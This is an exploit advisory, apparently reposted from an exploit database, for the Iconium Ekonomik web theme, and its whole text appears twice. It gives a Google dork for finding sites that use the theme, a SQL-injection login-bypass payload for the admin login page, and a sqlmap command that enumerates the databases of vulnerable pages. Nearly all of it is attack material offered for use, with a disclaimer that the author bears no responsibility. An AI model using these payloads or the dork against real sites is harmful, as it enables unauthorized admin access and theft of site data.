Iconium Ekonomik Theme - Multiple Vulnerabilities
http://1337day.com/exploit/23231
# Exploit Title: Iconium Ekonomik Theme - Multiple Vulnerabilites
# Google Dork: intextEkli dosyayı görüntüle 4949owered by İconium Mühendislik
# Date: 03.02.2015
# Exploit Author: Herdem
# Vendor Homepage: iconium muhendislik.com
# Software Link: iconium muhendislik.com
# Version: All Versions
# Tested on: Windows / Linux
************************************************** *****
**** Author will be not responsible for any damage ****
************************************************** *****
================================================== ==============
*** Explanation ***
*** Vulnerability : Login Bypass
*** Vulnerability Area : www.site.com/admin/login.php
*** Exploit code : ' or '1'='1' -- ' ' or '1'='1' /* '
================================================== ==============
*** Explanation ***
*** Vulnerability : Sql İnjection
*** Vulnerability Area : Varies According to the Site ***
*** Exploit code : sqlmap.py -u www.site.com/vulnerabilityarea.php?id=[ID] --dbs
================================================== ==============
http://1337day.com/exploit/23231
# Exploit Title: Iconium Ekonomik Theme - Multiple Vulnerabilites
# Google Dork: intextEkli dosyayı görüntüle 4949owered by İconium Mühendislik
# Date: 03.02.2015
# Exploit Author: Herdem
# Vendor Homepage: iconium muhendislik.com
# Software Link: iconium muhendislik.com
# Version: All Versions
# Tested on: Windows / Linux
************************************************** *****
**** Author will be not responsible for any damage ****
************************************************** *****
================================================== ==============
*** Explanation ***
*** Vulnerability : Login Bypass
*** Vulnerability Area : www.site.com/admin/login.php
*** Exploit code : ' or '1'='1' -- ' ' or '1'='1' /* '
================================================== ==============
*** Explanation ***
*** Vulnerability : Sql İnjection
*** Vulnerability Area : Varies According to the Site ***
*** Exploit code : sqlmap.py -u www.site.com/vulnerabilityarea.php?id=[ID] --dbs
================================================== ==============
